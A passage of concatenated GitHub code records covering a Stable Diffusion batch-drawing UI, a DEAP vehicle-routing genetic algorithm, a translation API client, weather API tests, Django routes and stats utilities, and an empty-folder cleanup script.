街头霸王(插画师)\",\n \"Shigenori Soejima - 女神异闻录系列、CATHERINE FULL BODY(插画师)\", \"Koyori - 只有我能进入的隐藏迷宫(插画师)\",\n \"Oyari Ashito - 学院黙示录、英雄伝説 空の軌跡(插画师)\", \"Sakura Hanpen - 干支魂(插画师)\",\n \"Yoshinori Shizuma - 决斗!平安京、罪人与龙(插画师)\"], value=\"Yoshinori Shizuma - 决斗!平安京、罪人与龙(插画师)\",\n elem_id=self.elem_id(\"xtf\"))\n rtf = gr.Dropdown(label=\"选择时代背景(预设)\",\n choices=[\" - 无\", \"Middle Ages - 中世纪\", \"Renaissance - 文艺复兴\", \"Meiji Period - 日本明治時代\",\n \"Industrial Revolution - 工业革命\", \"Edo Period - 日本江戸時代\", \"Roaring Twenties - 繁华的二十年代\",\n \"Cold War era - 冷战时期\", \"Information Age - 信息时代\", \"Song Dynasty - 中华宋朝\", \"Digital Age - 数字时代\",\n \"Warring States Period - 中华战国时期\", \"Bronze Age - 青铜时代\", \"Iron Age - 铁器时代\",\n \"Classical Antiquity - 古典时代\", \"Victorian Era - 维多利亚时代\", \"Gilded Age - 镀金时代\",\n \"Jazz Age - 爵士时代\", \"Space Age - 太空时代\", \"Ancient Egypt - 古埃及\",\n \"Golden Age of Hollywood - 好莱坞黄金时代\", \"Tang Dynasty - 中华唐朝\", \"Post-Modernism - 后现代主义\",\n \"Era of Good Feelings - 平和年代\", \"Age of Enlightenment - 启蒙时代\", \"Gothic Period - 哥特式时期\",\n \"Age of Exploration - 探险时代\", \"Art Nouveau - 新艺术运动\", \"Ming Dynasty - 中华明朝\",\n \"Atomic Age - 原子时代\", \"Baroque Period - 巴洛克时期\", \"Modernism - 现代主义\"],\n value=\" - 无\", elem_id=self.elem_id(\"rtf\"))\n\n # with gr.Row():\n # stf = gr.Dropdown(label=\"选择色调(预设)\", choices=[\" - 无\",\"Warm - 暖色调\", \"Cool - 冷色调\",\"Neutral - 中性色调\",\"Earthy - 泥土色调\",\"Pastel - 柔和色调\",\"Vibrant - 鲜艳色调\",\"Muted - 柔和色调\",\"Split-complementary - 分裂互补色调\",\"Monochromatic - 单色调\",], value=\"Muted - 柔和色调\", elem_id=self.elem_id(\"rtf\"))\n # btf = gr.Dropdown(label=\"选择漫画类型(预设)\", choices=[\" - 无\",\"Shonen Manga - 少年漫画\",\"Shojo Manga - 少女漫画\",\"Seinen Manga - 青年漫画\",\"Science Fiction Manga - 科幻漫画\",\"Gekiga - 剧情漫畫\",\"Kodomomuke Manga - 儿童漫画\",\"Fantasy Manga - 奇幻漫画\",\"Horror Manga - 恐怖漫画\",\"Sports Manga - 运动漫画\", \"Yaoi Manga - 耽美漫画\",\"Yuri Manga - 百合漫画\",], value=\"Shonen Manga - 少年漫画\", elem_id=self.elem_id(\"rtf\"))\n\n with gr.Row():\n seedX = gr.Number(label=\"Seed值,-1是随机,其他任意是稳定角色画风\", value=333, precision=2, elem_id=\"seedX\")\n MXT = gr.Number(label=\"连跑轮次,改多少轮,它就会跑多少轮,适合开随机变化抽卡\", value=1, precision=2, elem_id=\"MXT\")\n\n with gr.Row():\n CX1 = gr.Checkbox(label=\"随机微调【开启后,每个图的输出,随机细微变化,微调】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CX1\"))\n CXt = gr.Checkbox(label=\"随机镜头【开启后会随机镜头拍摄,开启后镜头更生动!】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CXt\"))\n tttr = gr.Slider(minimum=-6, maximum=6, step=1, label='画面气氛【左边恐怖阴暗,右边明亮乐观】', value=0, elem_id=self.elem_id(\"tttr\"))\n CXx = gr.Checkbox(label=\"分割文本【开启后会自动分割文本,适合粘贴整本小说用的。】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CXx\"))\n PTX = gr.Textbox(\n label=\"列表输入,这里输入批处理文本或者剧本,每行会输出一张图。【推荐使用GPT来写分镜,一段一个分镜】【推荐画布尺寸:300*450,450*300 高清就开放大】\",\n value=qqta, lines=1, elem_id=self.elem_id(\"PTX\"))\n with gr.Row():\n M1 = gr.Textbox(label=\"主角描述1,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M1\"))\n M2 = gr.Textbox(label=\"主角描述2,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M2\"))\n M3 = gr.Textbox(label=\"主角描述3,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M3\"))\n M4 = gr.Textbox(label=\"主角描述4,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M4\"))\n with gr.Row():\n M5 = gr.Textbox(label=\"主角描述5,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M5\"))\n M6 = gr.Textbox(label=\"主角描述6,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M6\"))\n M7 = gr.Textbox(label=\"主角描述7,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M7\"))\n M8 = gr.Textbox(label=\"主角描述8,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M8\"))\n with gr.Row():\n M9 = gr.Textbox(label=\"主角描述9,例如:lala-穿着���色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M9\"))\n M10 = gr.Textbox(label=\"主角描述10,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M10\"))\n M11 = gr.Textbox(label=\"主角描述11,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M11\"))\n M12 = gr.Textbox(label=\"主角描述12,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M12\"))\n with gr.Row():\n M13 = gr.Textbox(label=\"主角描述13,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M13\"))\n M14 = gr.Textbox(label=\"主角描述14,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M14\"))\n M15 = gr.Textbox(label=\"主角描述15,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M15\"))\n M16 = gr.Textbox(label=\"主角描述16,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M16\"))\n with gr.Row():\n M17 = gr.Textbox(label=\"主角描述17,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M17\"))\n M18 = gr.Textbox(label=\"主角描述18,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M18\"))\n M19 = gr.Textbox(label=\"主角描述19,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M19\"))\n M20 = gr.Textbox(label=\"主角描述20,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M20\"))\n\n with gr.Row():\n CX2 = gr.Checkbox(label=\"黑白漫画模式【开启后会输出为漫画的图】\", value=False, display=\"inline-block\", elem_id=self.elem_id(\"CX2\"))\n CX3 = gr.Checkbox(label=\"彩色漫画模式【开启后,会输出彩漫,会覆盖黑白】\", value=True, display=\"inline-block\", elem_id=self.elem_id(\"CX3\"))\n CX5 = gr.Checkbox(label=\"插画模式【开启后,会输出彩色插画,会覆盖彩漫】\", value=False, display=\"inline-block\", elem_id=self.elem_id(\"CX5\"))\n ttm = gr.Slider(minimum=-6, maximum=6, step=1, label='写实程度【往左边是卡通,往右边是写实】', value=0, elem_id=self.elem_id(\"ttm\"))\n with gr.Row():\n txtt = gr.Slider(minimum=0, maximum=6, step=1, label='透视强度【越强透视越狠】', value=0, elem_id=self.elem_id(\"txtt\"))\n fast = gr.Slider(minimum=0, maximum=6, step=1, label='动态强度【值越大,画面越动感,太大角色会崩】', value=0, elem_id=self.elem_id(\"fast\"))\n with gr.Row():\n ow_text = gr.Textbox(label=\"其他画风(输入画风,构图等等控制)最上面不选择的时候输入\", lines=1, elem_id=self.elem_id(\"CX4\"))\n style_txt = gr.Textbox(label=\"其他时代背景(时间,时代背景等.)最上面不选择的时候输入\", lines=1, elem_id=self.elem_id(\"style\"))\n flow_text = gr.Textbox(label=\"其他(可以补充任意词,会对每张图产生作用,比如lora之类的)\", lines=1, elem_id=self.elem_id(\"flow_text\"))\n file = gr.File(label=\"上传文件来载入任务列表,注意每行会产生一张图的任务。\", type='binary', elem_id=self.elem_id(\"file\"))\n file.change(fn=load_prompt_file, inputs=[file], outputs=[file, PTX, PTX])\n PTX.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=2), inputs=[PTX], outputs=[PTX])\n return [PTX, style_txt, flow_text, ow_text, seedX, CX1, CX2, CX3, CXt, MXT, fast, ttm, tttr, txtt, xtf, rtf, CX5, CXx, M1, M2, M3, M4, M5, M6,\n M7, M8, M9, M10, M11, M12, M13, M14, M15, M16, M17, M18, M19, M20]\n\n def run(self, p, PTX: str, style_txt: str, flow_text: str, ow_text: str, seedX: int, CX1: bool, CX2: bool, CX3: bool, CXt: bool, MXT: int,\n fast: int, ttm: int, tttr: int, txtt: int, xtf: str, rtf: str, CX5: bool, CXx: bool, M1: str, M2: str, M3: str, M4: str, M5, M6,\n M7, M8, M9, M10, M11, M12, M13, M14, M15, M16, M17, M18, M19, M20):\n global ppt, dddf\n\n qdf = f\",{PTX},\"\n if CXx:\n qdf = re.split(r'[.]', qdf)\n else:\n qdf = qdf.split(',')\n lines = [x.strip() for x in qdf if x.strip()]\n\n if not CXx:\n lines = [x.strip() for x in PTX.split('\\n') if x.strip()]\n\n lines = [x for x in lines if len(x) > 0]\n p.do_not_save_grid = True\n ppt = f\",{style_txt},\"\n dddf = f\",{flow_text},\"\n mtt = f\",{ow_text},\"\n c1 = f\"{M1},\"\n c2 = f\"{M2},\"\n c3 = f\"{M3},\"\n c4 = f\"{M4},\"\n c5 = f\"{M5},\"\n c6 = f\"{M6},\"\n c7 = f\"{M7},\"\n c8 = f\"{M8},\"\n c9 = f\"{M9},\"\n c10 = f\"{M10},\"\n c11 = f\"{M11},\"\n c12 = f\"{M12},\"\n c13 = f\"{M13},\"\n c14 = f\"{M14},\"\n c15 = f\"{M15},\"\n c16 = f\"{M16},\"\n c17 = f\"{M17},\"\n c18 = f\"{M18},\"\n c19 = f\"{M19},\"\n c20 = f\"{M20},\"\n jobs = []\n job_count = 0\n # mcc = get_name(stf)\n ddc = '(' + get_name(rtf) + ')'\n\n global ooo\n if \"hair\" in lines or \"cloth\" in lines:\n ooo = \"\"\n\n ggg = ooo + ppt + dddf\n\n if CX2:\n ggg = ggg + mtt1\n mcc = \"\"\n if CX3:\n ggg = ggg + mtt2\n if CX5:\n ggg = ggg + mtt3\n\n lines = lines * MXT\n\n for line in lines:\n args = {\"prompt\": line + '((' + get_name(xtf) + '))' + mtt + ddc + ggg + tttrt(tttr) + ddd(fast) + qqq(ttm) + ttxq(txtt)}\n job_count += args.get(\"n_iter\", p.n_iter)\n jobs.append(args)\n\n print(f\"准备 处理 {len(lines)} 行 在 {job_count} 任务列表,整个任务开始.\")\n if seedX != -1:\n p.seed = seedX\n\n state.job_count = job_count\n\n images = []\n all_prompts = []\n infotexts = []\n for n, args in enumerate(jobs):\n state.job = f\"{state.job_no + 1} out of {state.job_count}\"\n if CX1:\n args[\"prompt\"] = \"((\" + random.choice(cccctt.split(\",\")) + \"))\" + \",\" + args[\"prompt\"]\n if CXt:\n args[\"prompt\"] = \"((\" + random.choice(mqfd.split(\",\")) + \"))\" + \",\" + args[\"prompt\"]\n\n args[\"prompt\"] = kkkk(args[\"prompt\"],\n c1 + c2 + c3 + c4 + c5 + c6 + c7 + c8 + c9 + c10 + c11 + c12 + c13 + c14 + c15 + c16 + c17 + c18 + c19 + c20)\n print(\"-----准备开始处理任务:\", n + 1)\n copy_p = copy.copy(p)\n for k, v in args.items():\n setattr(copy_p, k, v)\n\n proc = process_images(copy_p)\n images += proc.images\n print(\" 处理了一张图. seed值为:\", copy_p.seed)\n\n return Processed(p, images, p.seed, \"\", all_prompts=all_prompts, infotexts=infotexts)\n","repo_name":"wqjuser/batch-draw","sub_path":"scripts/jubenchajian.py","file_name":"jubenchajian.py","file_ext":"py","file_size_in_byte":27807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41359291856","text":"## 环境设定\nimport numpy as np\n# import matplotlib.pyplot as plt\nfrom deap import base, tools, creator, algorithms\nimport random\nfrom copy import deepcopy\n\n\n# 设置绘图相关信息\nparams = {\n 'font.family': 'serif',\n 'figure.dpi': 300,\n 'savefig.dpi': 300,\n 'font.size': 12,\n 'legend.fontsize': 'small'\n }\n# plt.rcParams.update(params)\n\n\nclass DeapVrp:\n\n def __init__(self,NodeCoor,Demand,MaxLoad,fullDict,ServiceTime=1):\n creator.create('FitnessMin', base.Fitness, weights=(-1.0,)) # 最小化问题\n # 给个体一个routes属性用来记录其表示的路线\n creator.create('Individual', list, fitness=creator.FitnessMin) \n self.dataDict = {}\n self.dataDict['NodeCoor'] = NodeCoor\n self.dataDict['Demand'] = Demand\n self.dataDict['MaxLoad'] = MaxLoad\n self.dataDict['ServiceTime'] = ServiceTime\n self.fullDict = fullDict\n\n def genInd(self):\n dataDict = self.dataDict\n nCustomer = len(dataDict['NodeCoor']) - 1 # 顾客数量\n perm = np.random.permutation(nCustomer) + 1 # 生成顾客的随机排列,注意顾客编号为1--n\n pointer = 0 # 迭代指针\n lowPointer = 0 # 指针指向下界\n permSlice = []\n # 当指针不指向序列末尾时\n while pointer < nCustomer -1:\n vehicleLoad = 0\n # 当不超载时,继续装载\n while (vehicleLoad < dataDict['MaxLoad']) and (pointer < nCustomer -1):\n vehicleLoad += dataDict['Demand'][perm[pointer]]\n pointer += 1\n # 做随机打断,在车辆负载范围内,随机选择装载范围内的断点\n if lowPointer+1 < pointer:\n tempPointer = np.random.randint(lowPointer+1, pointer)\n permSlice.append(perm[lowPointer:tempPointer].tolist())\n lowPointer = tempPointer\n pointer = tempPointer\n else:\n permSlice.append(perm[lowPointer::].tolist())\n break\n # 将路线片段合并为染色体\n ind = [0]\n for eachRoute in permSlice:\n ind = ind + eachRoute + [0]\n return ind\n #-----------------------------------\n ## 评价函数\n # 染色体解码\n def decodeInd(self,ind):\n '''从染色体解码回路线片段,每条路径都是以0为开头与结尾'''\n indCopy = np.array(deepcopy(ind)) # 复制ind,防止直接对染色体进行改动\n idxList = list(range(len(indCopy)))\n zeroIdx = np.asarray(idxList)[indCopy == 0]\n routes = []\n for i,j in zip(zeroIdx[0::], zeroIdx[1::]):\n routes.append(ind[i:j]+[0])\n return routes\n\n def calDist(self,pos1, pos2):\n '''计算距离的辅助函数,根据给出的坐标pos1和pos2,返回两点之间的距离\n 输入: pos1, pos2 -- (x,y)元组\n 输出: 欧几里得距离'''\n return np.sqrt((pos1[0] - pos2[0])*(pos1[0] - pos2[0]) + (pos1[1] - pos2[1])*(pos1[1] - pos2[1]))\n\n\n\n\n # ------------------此处待完善|-----------------------\n\n\n\n #目前对loadpenalty只做简单加和 实际是负载超标的部分直接跟距离做加和\n def loadPenalty(self,routes):\n '''辅助函数,因为在交叉和突变中可能会产生不符合负载约束的个体,需要对不合要求的个体进行惩罚'''\n dataDict = self.dataDict\n penalty = 0\n # 计算每条路径的负载,取max(0, routeLoad - maxLoad)计入惩罚项\n for eachRoute in routes:\n routeLoad = np.sum([dataDict['Demand'][i] for i in eachRoute])\n penalty += max(0, routeLoad - dataDict['MaxLoad'])\n return penalty\n\n # ------------------此处待完善|-----------------------\n\n\n def calRouteLen(self,routes):\n '''辅助函数,返回给定路径的总长度'''\n dataDict = self.dataDict\n totalDistance = 0 # 记录各条路线的总长度\n for eachRoute in routes:\n # 从每条路径中抽取相邻两个节点,计算节点距离并进行累加\n for i,j in zip(eachRoute[0::], eachRoute[1::]):\n totalDistance += self.calDist(dataDict['NodeCoor'][i], dataDict['NodeCoor'][j]) \n return totalDistance\n\n def evaluate(self,ind):\n '''评价函数,返回解码后路径的总长度,'''\n routes = self.decodeInd(ind) # 将个体解码为路线\n totalDistance = self.calRouteLen(routes)\n return (totalDistance + self.loadPenalty(routes)),\n #-----------------------------------\n ## 交叉操作\n def genChild(self,ind1, ind2, nTrail=5):\n '''参考《基于电动汽车的带时间窗的路径优化问题研究》中给出的交叉操作,生成一个子代'''\n # 在ind1中随机选择一段子路径subroute1,将其前置\n routes1 = self.decodeInd(ind1) # 将ind1解码成路径\n numSubroute1 = len(routes1) # 子路径数量\n if numSubroute1<3:\n return []\n subroute1 = routes1[np.random.randint(0, numSubroute1)]\n # 将subroute1中没有出现的顾客按照其在ind2中的顺序排列成一个序列\n unvisited = set(ind1) - set(subroute1) # 在subroute1中没有出现访问的顾客\n unvisitedPerm = [digit for digit in ind2 if digit in unvisited] # 按照在ind2中的顺序排列\n if len(unvisitedPerm) == 0:\n return []\n # 多次重复随机打断,选取适应度最好的个体\n bestRoute = None # 容器\n bestFit = np.inf\n for _ in range(nTrail):\n # 将该序列随机打断为numSubroute1-1条子路径\n breakPos = [0]+random.sample(range(1,len(unvisitedPerm)),numSubroute1-2) # 产生numSubroute1-2个断点\n breakPos.sort()\n breakSubroute = []\n # if len(breakPos)<=2:\n # continue\n for i,j in zip(breakPos[0::], breakPos[1::]):\n breakSubroute.append([0]+unvisitedPerm[i:j]+[0])\n breakSubroute.append([0]+unvisitedPerm[j:]+[0])\n # 更新适应度最佳的打断方式\n # 将先前取出的subroute1添加入打断结果,得到完整的配送方案\n breakSubroute.append(subroute1)\n # 评价生成的子路径\n routesFit = self.calRouteLen(breakSubroute) + self.loadPenalty(breakSubroute)\n if routesFit < bestFit:\n bestRoute = breakSubroute\n bestFit = routesFit\n # 将得到的适应度最佳路径bestRoute合并为一个染色体\n child = []\n for eachRoute in bestRoute:\n child += eachRoute[:-1]\n return child+[0]\n\n def crossover(self,ind1, ind2):\n '''交叉操作'''\n ind1[:], ind2[:] = self.genChild(ind1, ind2), self.genChild(ind2, ind1)\n return ind1, ind2\n\n #-----------------------------------\n ## 突变操作\n def opt(self,route, k=2):\n # 用2-opt算法优化路径\n # 输入:\n # route -- sequence,记录路径\n # 输出: 优化后的路径optimizedRoute及其路径长度\n dataDict = self.dataDict\n nCities = len(route) # 城市数\n optimizedRoute = route # 最优路径\n minDistance = self.calRouteLen([route]) # 最优路径长度\n for i in range(1,nCities-2):\n for j in range(i+k, nCities):\n if j-i == 1:\n continue\n reversedRoute = route[:i]+route[i:j][::-1]+route[j:]# 翻转后的路径\n reversedRouteDist = self.calRouteLen([reversedRoute])\n # 如果翻转后路径更优,则更新最优解\n if reversedRouteDist < minDistance:\n minDistance = reversedRouteDist\n optimizedRoute = reversedRoute\n return optimizedRoute\n\n def mutate(self,ind):\n '''用2-opt算法对各条子路径进行局部优化'''\n routes = self.decodeInd(ind)\n optimizedAssembly = []\n for eachRoute in routes:\n optimizedRoute = self.opt(eachRoute)\n optimizedAssembly.append(optimizedRoute)\n # 将路径重新组装为染色体\n child = []\n for eachRoute in optimizedAssembly:\n child += eachRoute[:-1]\n ind[:] = child+[0]\n return ind,\n def predict(self):\n toolbox = base.Toolbox()\n toolbox.register('individual', tools.initIterate, creator.Individual, self.genInd)\n toolbox.register('population', tools.initRepeat, list, toolbox.individual)\n toolbox.register('evaluate', self.evaluate)\n toolbox.register('select', tools.selTournament, tournsize=2)\n toolbox.register('mate', self.crossover)\n toolbox.register('mutate', self.mutate)\n\n ## 生成初始族群\n toolbox.popSize = 100\n pop = toolbox.population(toolbox.popSize)\n\n ## 记录迭代数据\n stats=tools.Statistics(key=lambda ind: ind.fitness.values)\n stats.register('min', np.min)\n stats.register('avg', np.mean)\n stats.register('std', np.std)\n hallOfFame = tools.HallOfFame(maxsize=1)\n\n ## 遗传算法参数\n toolbox.ngen = 50\n\n toolbox.cxpb = 0.8\n toolbox.mutpb = 0.1\n\n ## 遗传算法主程序\n ## 遗传算法主程序\n pop,logbook=algorithms.eaMuPlusLambda(pop, toolbox, mu=toolbox.popSize, \n lambda_=toolbox.popSize,cxpb=toolbox.cxpb, mutpb=toolbox.mutpb,\n ngen=toolbox.ngen ,stats=stats, halloffame=hallOfFame, verbose=True)\n tour = tools.selBest(pop, k=1)[0]\n logavg = [d['avg'] for d in logbook]\n logmin = [d['min'] for d in logbook]\n loggen = [d['gen'] for d in logbook]\n real_tour = []\n tour_decode = self.decodeInd(tour)\n finaltour = deepcopy(tour_decode)\n for i in range(len(tour_decode)):\n for j in range(len(tour_decode[i])):\n for k,v in self.fullDict.items():\n if v == self.dataDict['NodeCoor'][tour_decode[i][j]]:\n finaltour[i][j] = k\n\n return finaltour\n\n\nif __name__ == '__main__':\n #-----------------------------------\n ## 注册遗传算法操作\n deap = DeapVrp()\n deap.predict()\n","repo_name":"1sucong/GeneVrp","sub_path":"sucong/norm_model.py","file_name":"norm_model.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37303874834","text":"import time\nfrom logging import Logger\nfrom typing import Any, Optional\nfrom urllib.parse import urljoin\n\nimport httpx\n\nfrom .items import MiniCard\n\n\nclass Client:\n \"\"\"Lingvo Live API client.\"\"\"\n SERVICE_URL = 'https://developers.lingvolive.com/'\n USER_AGENT = 'LingCApp/0.1'\n\n def __init__(self, key: str, timeout: float, logger: Logger, verbose: bool = False) -> None:\n self.key = key\n self.token: Optional[str] = None\n\n self.timeout = timeout\n self.logger = logger\n self.verbose = verbose\n\n @staticmethod\n def duration_ms_from(start: int) -> float:\n \"\"\"\n It returns the duration in milliseconds.\n Where start is the time.monotonic_ns() value.\n \"\"\"\n return (time.monotonic_ns() - start) / 1_000_000\n\n @property\n def base_headers(self) -> dict[str, str]:\n return {\n 'User-Agent': self.USER_AGENT,\n 'Content-Length': '0',\n }\n\n def url(self, path: str) -> str:\n \"\"\"Returns full URL for custom request path.\"\"\"\n return urljoin(self.SERVICE_URL, path)\n\n def authenticate(self) -> bool:\n url = self.url('api/v1.1/authenticate')\n headers = self.base_headers\n headers.update({'Authorization': f'Basic {self.key}'})\n\n try:\n response = httpx.post(url, headers=headers, timeout=self.timeout)\n except httpx.RequestError as exc:\n self.logger.error(f'Error: {exc}')\n return False\n\n if response.status_code != httpx.codes.OK:\n self.logger.error(f'Error: {response.status_code} {response.reason_phrase}')\n return False\n\n self.token = response.text.strip('\"')\n return True\n\n async def _common_translate(self, client: httpx.AsyncClient, url: str, params: dict[str, Any]) -> Optional[dict]:\n headers = self.base_headers\n headers.update({'Authorization': f'Bearer {self.token}'})\n\n try:\n response = await client.get(url, params=params, headers=headers)\n response.raise_for_status()\n except httpx.HTTPError as exc:\n self.logger.error(f'Error: {exc}')\n return\n\n return response.json()\n\n async def mini_card(self, client: httpx.AsyncClient, text: str, src: int, dst: int) -> Optional[MiniCard]:\n start = time.monotonic_ns()\n url = self.url('api/v1/Minicard')\n params = {'text': text, 'srcLang': src, 'dstLang': dst}\n\n data = await self._common_translate(client, url, params)\n if not data:\n return\n\n duration = self.duration_ms_from(start) if self.verbose else 0.0\n return MiniCard(\n heading=data['Heading'],\n translation=data['Translation']['Translation'],\n dictionary=data['Translation']['DictionaryName'],\n duration=duration,\n )\n\n async def translate(self, client: httpx.AsyncClient, text: str, src: int, dst: int) -> Optional[dict]:\n url = self.url('api/v1/Translation')\n params = {'text': text, 'srcLang': src, 'dstLang': dst}\n\n return await self._common_translate(client, url, params)\n","repo_name":"z0rr0/lingcapp","sub_path":"app/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24476330077","text":"import aiohttp\nimport pytest\n\nfrom app import api_get_weather\nfrom app.config import settings as test_settings\n\n\n@pytest.fixture\n@pytest.mark.asyncio\nasync def client_session():\n session = aiohttp.ClientSession()\n yield session\n await session.close()\n\n\n@pytest.mark.asyncio\nasync def test_celsius(client_session):\n # ok request for celsius degrees\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'm', client_session)\n assert 'error' not in res\n\n\n@pytest.mark.asyncio\nasync def test_fahrenheit(client_session):\n # ok request for fahrenheit degrees\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'f', client_session)\n assert 'error' not in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_units(client_session):\n # bad request: unsupported degrees type\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'London', 'some_units', client_session)\n assert 'error' in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_city(client_session):\n # bad request: city name doesn't exist\n res = await api_get_weather(test_settings.WEATHER_API_KEY, '12j3i1l23n123', 'm', client_session)\n assert 'error' in res\n\n\n@pytest.mark.asyncio\nasync def test_bad_city_and_units(client_session):\n res = await api_get_weather(test_settings.WEATHER_API_KEY, 'UnknownCity', 'some_units', client_session)\n assert 'error' in res\n","repo_name":"SuperSolik/epam-python-test-task","sub_path":"tests/test_api_call.py","file_name":"test_api_call.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11344045971","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import static\n\n\nurlpatterns = [\n \n \n path('home',views.Home,name=\"Home\"),\n path('servicios',views.servicios, name=\"Servicios\"),\n path('tienda',views.tienda, name=\"Tienda\"),\n path('registrate',views.registrate, name=\"Registrate\"),\n path('Bas',views.Bas, name=\"Bas\"),\n path('funcion', views.funcion,name='funcion'),\n path('ferreteria', views.ferreteria,name='ferreteria'),\n path('crear', views.crear,name='crear'),\n path('eliminar', views.eliminar,name='eliminar'),\n path('editar', views.editar,name='editar'),\n path('index', views.index,name='index'),\n path('header', views.header,name='header'),\n \n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT )\n\n","repo_name":"LSant11/Trabajo-adicional-de-desarrollo","sub_path":"Aplicacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69898046227","text":"import os\n\ndef delete_empty_folders(directory):\n\tfor root, dirs, files in os.walk(directory, topdown=False):\n\t\tfor folder in dirs:\n\t\t\tfolder_path = os.path.join(root, folder)\n\t\t\tif not os.listdir(folder_path): ## Check if is not used\n\t\t\t\tprint(f\"Deleting empty folder: {folder_path}\")\n\t\t\t\tos.rmdir(folder_path)\n\nif __name__ == \"__main__\":\n\ttarget_directory = r\"F:\\Development\\Packer - Dev\\Client\"\n\tdelete_empty_folders(target_directory)\n","repo_name":"vaynz/clear-useless-folders","sub_path":"shit.py","file_name":"shit.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29663927676","text":"from collections import Counter\nfrom dataclasses import dataclass\n\nfrom django.db.models import QuerySet\nfrom wordcloud import WordCloud\n\nfrom press.models import Post\n\n\nclass StatsDict(dict):\n\n def top(self, limit=10):\n return self._get_top(self, limit)\n\n @staticmethod\n def _get_top(dict_to_limit: dict, limit=10):\n sorted_items = sorted(dict_to_limit.items(), key=lambda item: (-item[1], item[0]))\n keys = [key for key, val in sorted_items][:limit]\n top_dict = StatsDict()\n for key in keys:\n value = dict_to_limit[key]\n top_dict[key] = value\n\n return top_dict\n\n @classmethod\n def from_msg(cls, msg: str):\n tokens = msg.split(' ')\n return cls(**Counter(tokens))\n\n def word_cloud(self, limit=15):\n freqs_weighted = get_weighted_frequencies(self)\n top_weighted_values = self._get_top(freqs_weighted, limit)\n wc = WordCloud()\n wc.fit_words(top_weighted_values)\n return wc\n\n def word_cloud_svg(self, limit=15):\n wc = self.word_cloud(limit)\n return wc.to_svg()\n\n\n@dataclass\nclass Stats:\n titles: StatsDict\n bodies: StatsDict\n\n @property\n def all(self):\n return StatsDict({**self.titles, **self.bodies})\n\n\ndef extract_single_post_stats(post: Post):\n titles_stats = StatsDict.from_msg(post.title)\n bodies_stats = StatsDict.from_msg(post.body)\n return Stats(titles=titles_stats, bodies=bodies_stats)\n\n\ndef extract_posts_stats(posts: QuerySet[Post]):\n titles = posts.values_list('title', flat=True)\n bodies = posts.values_list('body', flat=True)\n if not titles and not bodies:\n return None\n\n titles_msgs = ' '.join(titles)\n bodies_msgs = ' '.join(bodies)\n titles_stats = StatsDict.from_msg(titles_msgs)\n bodies_stats = StatsDict.from_msg(bodies_msgs)\n return Stats(titles=titles_stats, bodies=bodies_stats)\n\n\ndef get_weighted_frequencies(text_frequencies: StatsDict):\n weighted = {}\n for key, value in text_frequencies.items():\n value = len(key) or 1\n if 3 < len(key) < 15:\n value = len(key) ** 2\n elif len(key) >= 15:\n value = 1\n weighted[key] = value\n return weighted\n\n\ndef word_cloud_to_filename(text_frequencies: StatsDict, filename):\n # This would be an exercise for the students\n wc = text_frequencies.word_cloud()\n wc.to_file(filename)\n return filename\n","repo_name":"tuxskar/coolpress","sub_path":"coolpress/press/stats_manager.py","file_name":"stats_manager.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"42322042935","text":"import os\nimport re\nimport zipfile\nimport math\nimport pandas as pd\nfrom datasets import load_dataset, concatenate_datasets, Dataset, DatasetDict\nfrom transformers import AutoTokenizer\npd.options.mode.chained_assignment = None # Remove chained assignment warning\n\nclass LyricsDataset():\n def __init__(self, config, filter_field, dataset_id, performance_evaluation_nremovals=None):\n self.config = config\n self.filter_field = filter_field\n 